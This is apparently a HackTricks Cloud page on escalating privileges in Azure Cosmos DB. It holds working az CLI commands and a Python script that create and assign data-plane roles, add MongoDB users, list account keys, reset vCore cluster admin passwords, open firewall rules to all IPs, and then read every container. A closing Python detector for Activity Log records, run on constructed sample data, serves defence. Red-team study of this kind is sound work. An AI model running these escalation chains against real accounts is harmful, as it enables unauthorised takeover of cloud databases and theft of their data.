Az - CosmosDB Privesc
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
CosmosDB Privesc
For more information about SQL Database check:
(Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write, Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read) & (Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write, Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read)
With these permissions you can escalate privileges by giving a principal you control the data-plane rights to connect to the account (NoSQL API) and execute queries. First a role definition is created with the required data actions and scope. Note that the `Id` must be a valid GUID, the assignable scope is the full resource ID of the target account, and the JSON body cannot contain shell-style comments:
```bash
# The Id must be a valid GUID (generate one with: uuidgen)
az cosmosdb sql role definition create \
  --account-name <account_name> \
  --resource-group <resource_group_name> \
  --body '{
    "Id": "<Random-Unique-GUID>",
    "RoleName": "CustomReadRole",
    "Type": "CustomRole",
    "AssignableScopes": [
      "/subscriptions/<subscription_id>/resourceGroups/<resource_group_name>/providers/Microsoft.DocumentDB/databaseAccounts/<account_name>"
    ],
    "Permissions": [
      {
        "DataActions": [
          "Microsoft.DocumentDB/databaseAccounts/readMetadata",
          "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/items/read",
          "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/*"
        ]
      }
    ]
  }'
```
Then the role definition is assigned to a principal. `--scope "/"` is relative to the account and covers every database and container in it. After this, that principal can authenticate to the account endpoint with an Entra ID token (for example through `DefaultAzureCredential()` in the Azure SDKs) and execute queries without needing an account key. The read permissions from the heading let you confirm the result with `az cosmosdb sql role definition list` and `az cosmosdb sql role assignment list`.
```bash
az cosmosdb sql role assignment create \
  --account-name <account_name> \
  --resource-group <resource_group_name> \
  --role-definition-id <Random-Unique-GUID-used-in-definition> \
  --principal-id <principal_id-to-give-perms> \
  --scope "/"
```
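The same chain in Python, as an added example (not code from the original page): the two builders produce the bodies the CLI commands above send, `escalate()` runs them through the azure-mgmt-cosmosdb SDK, and `dump_account()` then queries as the principal with `DefaultAzureCredential` through azure-cosmos. The subscription, resource group, account name, principal id and endpoint are placeholders, and the SDK calls assume the current azure-mgmt-cosmosdb and azure-cosmos packages.

```python
"""Cosmos DB (NoSQL API) data-plane privesc: create a custom SQL role
definition, assign it to a principal and query as that principal.
Added example built on azure-mgmt-cosmosdb, azure-identity and azure-cosmos;
all subscription/account/principal values are placeholders."""
import re
import uuid

# Data actions from the page: readMetadata is needed to enumerate databases and
# containers; containers/* covers every item-level operation.
DATA_ACTIONS = [
    "Microsoft.DocumentDB/databaseAccounts/readMetadata",
    "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/items/read",
    "Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/*",
]

GUID_RE = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$", re.IGNORECASE)


def account_resource_id(subscription_id, resource_group, account_name):
    """ARM id of the database account: the assignable scope of the role and the
    prefix of the role definition id used in the assignment."""
    return (f"/subscriptions/{subscription_id}/resourceGroups/{resource_group}"
            f"/providers/Microsoft.DocumentDB/databaseAccounts/{account_name}")


def build_role_definition(subscription_id, resource_group, account_name,
                          role_name="CustomReadRole", role_id=None):
    """Body for sqlRoleDefinitions/write. The Id must be a GUID (the resource
    provider rejects anything else), so it is generated and validated here."""
    role_id = role_id or str(uuid.uuid4())
    if not GUID_RE.match(role_id):
        raise ValueError(f"role definition Id must be a GUID, got {role_id!r}")
    return {
        "Id": role_id,
        "RoleName": role_name,
        "Type": "CustomRole",
        "AssignableScopes": [account_resource_id(subscription_id, resource_group, account_name)],
        "Permissions": [{"DataActions": list(DATA_ACTIONS)}],
    }


def build_role_assignment(subscription_id, resource_group, account_name, role_id, principal_id):
    """Body for sqlRoleAssignments/write. Scope is the whole account (what
    --scope "/" means in the CLI); the definition is referenced by its ARM id."""
    account = account_resource_id(subscription_id, resource_group, account_name)
    return {
        "RoleDefinitionId": f"{account}/sqlRoleDefinitions/{role_id}",
        "Scope": account,
        "PrincipalId": principal_id,
    }


def escalate(subscription_id, resource_group, account_name, principal_id):
    """Control-plane half (needs sqlRoleDefinitions/write and
    sqlRoleAssignments/write). Returns the role definition Id. The SDK imports
    live here so the builders above work without the Azure packages installed."""
    from azure.identity import DefaultAzureCredential
    from azure.mgmt.cosmosdb import CosmosDBManagementClient
    from azure.mgmt.cosmosdb.models import (
        Permission, SqlRoleAssignmentCreateUpdateParameters,
        SqlRoleDefinitionCreateUpdateParameters)

    client = CosmosDBManagementClient(DefaultAzureCredential(), subscription_id)
    definition = build_role_definition(subscription_id, resource_group, account_name)
    client.sql_resources.begin_create_update_sql_role_definition(
        definition["Id"], resource_group, account_name,
        SqlRoleDefinitionCreateUpdateParameters(
            role_name=definition["RoleName"], type=definition["Type"],
            assignable_scopes=definition["AssignableScopes"],
            permissions=[Permission(data_actions=DATA_ACTIONS)]),
    ).result()
    assignment = build_role_assignment(
        subscription_id, resource_group, account_name, definition["Id"], principal_id)
    client.sql_resources.begin_create_update_sql_role_assignment(
        str(uuid.uuid4()), resource_group, account_name,
        SqlRoleAssignmentCreateUpdateParameters(
            role_definition_id=assignment["RoleDefinitionId"],
            scope=assignment["Scope"], principal_id=assignment["PrincipalId"]),
    ).result()
    return definition["Id"]


def dump_account(endpoint):
    """Data-plane half, run as the assigned principal: an Entra ID token from
    DefaultAzureCredential is accepted thanks to the data-plane role, no account
    key needed. Returns {database: {container: item_count}}."""
    from azure.cosmos import CosmosClient
    from azure.identity import DefaultAzureCredential

    client = CosmosClient(endpoint, credential=DefaultAzureCredential())
    found = {}
    for db in client.list_databases():  # requires the readMetadata data action
        db_client = client.get_database_client(db["id"])
        found[db["id"]] = {}
        for container in db_client.list_containers():
            items = db_client.get_container_client(container["id"]).query_items(
                "SELECT * FROM c", enable_cross_partition_query=True)
            found[db["id"]][container["id"]] = sum(1 for _ in items)
    return found


if __name__ == "__main__":
    # Placeholders: target subscription/account and the object id of the principal you control.
    rid = escalate("<subscription_id>", "<resource_group_name>", "<account_name>", "<principal_id>")
    print("assigned role definition", rid)
    print(dump_account("https://<account_name>.documents.azure.com:443/"))
```

The builders are kept separate from the SDK calls on purpose: they can be checked offline (the GUID validation is the mistake that most often makes the CLI version fail), and the same bodies can be pasted into `--body` if the SDK is not available.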
(Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/write && Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/read) && (Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write && Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read)
With these permissions you can create new MongoDB role definitions within an Azure Cosmos DB for MongoDB (RU-based) account, i.e. custom roles with specific privileges on databases and collections. Role-based access control must be enabled on the account for this to work (the `EnableMongoRoleBasedAccessControl` capability).
```bash
az cosmosdb mongodb role definition create \
  --account-name <account_name> \
  --resource-group <resource_group_name> \
  --body '{
    "Id": "<mydatabase>.readWriteRole",
    "RoleName": "readWriteRole",
    "Type": "CustomRole",
    "DatabaseName": "<mydatabase>",
    "Privileges": [
      {
        "Resource": {
          "Db": "<mydatabase>",
          "Collection": "mycollection"
        },
        "Actions": [
          "insert",
          "find",
          "update"
        ]
      }
    ],
    "Roles": []
  }'
```
You can create new MongoDB user definitions within an Azure Cosmos DB account. This allows the provisioning of users with specific roles and access to MongoDB databases.
```bash
az cosmosdb mongodb user definition create \
  --account-name <account_name> \
  --resource-group <resource_group_name> \
  --body '{
    "Id": "<mydatabase>.myUser",
    "UserName": "<myUser>",
    "Password": "<mySecurePassword>",
    "DatabaseName": "<mydatabase>",
    "CustomData": "TestCustomData",
    "Mechanisms": "SCRAM-SHA-256",
    "Roles": [
      {
        "Role": "readWriteRole",
        "Db": "<mydatabase>"
      }
    ]
  }'
```
Once the user exists you can connect to the account with its credentials. The database in the connection string path must be the one the user was defined in, since that is also the database the user authenticates against:
```bash
mongosh "mongodb://<myUser>:<mySecurePassword>@<account_name>.mongo.cosmos.azure.com:10255/<mydatabase>?ssl=true&replicaSet=globaldb&retrywrites=false"
```
Microsoft.DocumentDB/databaseAccounts/listKeys/action
With this permission you can retrieve the primary and secondary keys of an Azure Cosmos DB account. These keys give full data-plane access to the account (read and write every item, create or delete databases and containers) regardless of any data-plane role assignments. They only work if key-based authentication has not been disabled on the account (`disableLocalAuth`). The same command returns ready-to-use connection strings with `--type connection-strings`; listing only the read-only keys requires `Microsoft.DocumentDB/databaseAccounts/readonlykeys/action` instead.
```bash
az cosmosdb keys list \
  --name <account_name> \
  --resource-group <resource_group_name>
# Same, but as connection strings:
az cosmosdb keys list \
  --name <account_name> \
  --resource-group <resource_group_name> \
  --type connection-strings
```
Microsoft.DocumentDB/mongoClusters/read, Microsoft.DocumentDB/mongoClusters/write
These permissions apply to Azure Cosmos DB for MongoDB vCore clusters (`Microsoft.DocumentDB/mongoClusters`): you can create, update or delete clusters, which includes provisioning new ones, changing the configuration of existing ones, decommissioning them, or resetting the administrator login and password and thereby taking over the cluster. The `az cosmosdb mongocluster` commands are provided by the `cosmosdb-preview` CLI extension.
```bash
# Reset the cluster admin credentials to values you control
az cosmosdb mongocluster update \
  --cluster-name <cluster-name> \
  --resource-group <res-group> \
  --administrator-login "<username>" \
  --administrator-login-password "<password>"
```
Microsoft.DocumentDB/mongoClusters/read, Microsoft.DocumentDB/mongoClusters/firewallRules/write
With these permissions you can create or modify the firewall rules of a MongoDB vCore cluster, i.e. control which IP addresses or ranges can reach it. Adding a rule for your own IP (or the whole 0.0.0.0-255.255.255.255 range) exposes the cluster to you, and combined with the admin password reset above gives you administrator access over the network.
```bash
# Create Rule
az cosmosdb mongocluster firewall-rule create \
  --cluster-name <cluster-name> \
  --resource-group <res-group> \
  --rule-name <rule-name> \
  --start-ip-address <start_ip> \
  --end-ip-address <end_ip>
```
Note that at the time of writing MongoDB vCore does not support creating users from inside the database, which would otherwise be useful for persistence:
```
[mongos] test> db.createUser({
  user: "adminUser",
  pwd: "securePassword",
  roles: [ { role: "root", db: "admin" } ]
})
MongoServerError[CommandNotSupported]: CreateUser command is not supported
```
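From the defender's side, every operation on this page is a control-plane write that lands in the Azure Activity Log. The following detection logic is an added example (not from the original page): it flags each successful watched operation and raises a high alert when the same caller completes a definition-then-assignment (or role-then-user) chain on one account within a time window. The records in `SAMPLE` are constructed and keep only a subset of the Activity Log fields (time, caller, operationName, status, resourceId); a real pipeline would map them from the exported JSON.

```python
"""Detect the Cosmos DB control-plane privesc operations from this page in
Azure Activity Log records. Added example; SAMPLE is constructed data with a
simplified subset of the Activity Log fields."""
from collections import defaultdict
from datetime import datetime, timedelta

# Operations from the page (matched case-insensitively; the Activity Log export
# upper-cases them) and what a successful call gives the caller.
WATCHED = {
    "MICROSOFT.DOCUMENTDB/DATABASEACCOUNTS/SQLROLEDEFINITIONS/WRITE": "custom NoSQL data-plane role created",
    "MICROSOFT.DOCUMENTDB/DATABASEACCOUNTS/SQLROLEASSIGNMENTS/WRITE": "NoSQL data-plane role assigned to a principal",
    "MICROSOFT.DOCUMENTDB/DATABASEACCOUNTS/MONGODBROLEDEFINITIONS/WRITE": "custom MongoDB role created",
    "MICROSOFT.DOCUMENTDB/DATABASEACCOUNTS/MONGODBUSERDEFINITIONS/WRITE": "MongoDB user with password created",
    "MICROSOFT.DOCUMENTDB/DATABASEACCOUNTS/LISTKEYS/ACTION": "account keys read (full data-plane access)",
    "MICROSOFT.DOCUMENTDB/MONGOCLUSTERS/WRITE": "vCore cluster changed (admin password reset possible)",
    "MICROSOFT.DOCUMENTDB/MONGOCLUSTERS/FIREWALLRULES/WRITE": "vCore cluster firewall rule created or changed",
}

# second step -> first step: a definition write followed by an assignment/user
# write by the same caller on the same account is the complete chain from the page.
CHAINS = {
    "MICROSOFT.DOCUMENTDB/DATABASEACCOUNTS/SQLROLEASSIGNMENTS/WRITE":
        "MICROSOFT.DOCUMENTDB/DATABASEACCOUNTS/SQLROLEDEFINITIONS/WRITE",
    "MICROSOFT.DOCUMENTDB/DATABASEACCOUNTS/MONGODBUSERDEFINITIONS/WRITE":
        "MICROSOFT.DOCUMENTDB/DATABASEACCOUNTS/MONGODBROLEDEFINITIONS/WRITE",
}


def account_of(resource_id):
    """Reduce a child resource id (.../databaseAccounts/x/sqlRoleDefinitions/y)
    to the database account or vCore cluster it belongs to."""
    parts = resource_id.split("/")
    lower = [p.lower() for p in parts]
    for kind in ("databaseaccounts", "mongoclusters"):
        if kind in lower:
            i = lower.index(kind)
            return "/".join(parts[:i + 2])
    return resource_id


def parse_time(ts):
    """Activity Log timestamps are ISO 8601 with a trailing Z."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def analyze(records, window_minutes=30):
    """One medium alert per successful watched operation, plus one high alert
    each time a caller completes a chain on an account within the window."""
    window = timedelta(minutes=window_minutes)
    alerts = []
    history = defaultdict(list)  # (caller, account) -> [(time, op)]
    for rec in sorted(records, key=lambda r: r["time"]):
        op = rec["operationName"].upper()
        if op not in WATCHED or rec.get("status") != "Succeeded":
            continue  # failed attempts are worth hunting too, but are not alerted here
        key = (rec["caller"], account_of(rec["resourceId"]))
        t = parse_time(rec["time"])
        alerts.append({"severity": "medium", "caller": key[0], "account": key[1],
                       "time": rec["time"], "reason": WATCHED[op]})
        first = CHAINS.get(op)
        if first and any(p == first and t - t0 <= window for t0, p in history[key]):
            alerts.append({"severity": "high", "caller": key[0], "account": key[1],
                           "time": rec["time"],
                           "reason": f"privesc chain completed: {WATCHED[first]}, then {WATCHED[op]}"})
        history[key].append((t, op))
    return alerts


# Constructed records: an attacker completing the NoSQL chain (plus one failed
# retry), a pipeline identity listing keys and creating a Mongo user without a
# preceding role definition, and an unrelated read that must not alert.
ACCT = "/subscriptions/sub/resourceGroups/rg/providers/Microsoft.DocumentDB/databaseAccounts/acct"
MONGO_ACCT = "/subscriptions/sub/resourceGroups/rg/providers/Microsoft.DocumentDB/databaseAccounts/mongo-acct"
SAMPLE = [
    {"time": "2024-05-01T10:00:00Z", "caller": "attacker@contoso.com", "status": "Succeeded",
     "operationName": "Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write",
     "resourceId": ACCT + "/sqlRoleDefinitions/1111"},
    {"time": "2024-05-01T10:02:00Z", "caller": "attacker@contoso.com", "status": "Succeeded",
     "operationName": "Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write",
     "resourceId": ACCT + "/sqlRoleAssignments/2222"},
    {"time": "2024-05-01T10:03:00Z", "caller": "attacker@contoso.com", "status": "Failed",
     "operationName": "Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write",
     "resourceId": ACCT + "/sqlRoleAssignments/3333"},
    {"time": "2024-05-01T11:00:00Z", "caller": "pipeline-sp", "status": "Succeeded",
     "operationName": "Microsoft.DocumentDB/databaseAccounts/listKeys/action",
     "resourceId": ACCT},
    {"time": "2024-05-01T12:00:00Z", "caller": "pipeline-sp", "status": "Succeeded",
     "operationName": "Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write",
     "resourceId": MONGO_ACCT + "/mongodbUserDefinitions/app.backup"},
    {"time": "2024-05-01T09:00:00Z", "caller": "dev@contoso.com", "status": "Succeeded",
     "operationName": "Microsoft.DocumentDB/databaseAccounts/read",
     "resourceId": ACCT},
]

if __name__ == "__main__":
    for a in analyze(SAMPLE):
        print(f'{a["severity"]:6} {a["time"]} {a["caller"]:22} {a["reason"]}')
```

The chain correlation is keyed on (caller, account) rather than on the caller alone, so a legitimate admin creating a role on one account and a user on another does not trip the high alert; shrinking `window_minutes` to 1 on the sample data drops the chain alert and leaves only the four per-operation ones.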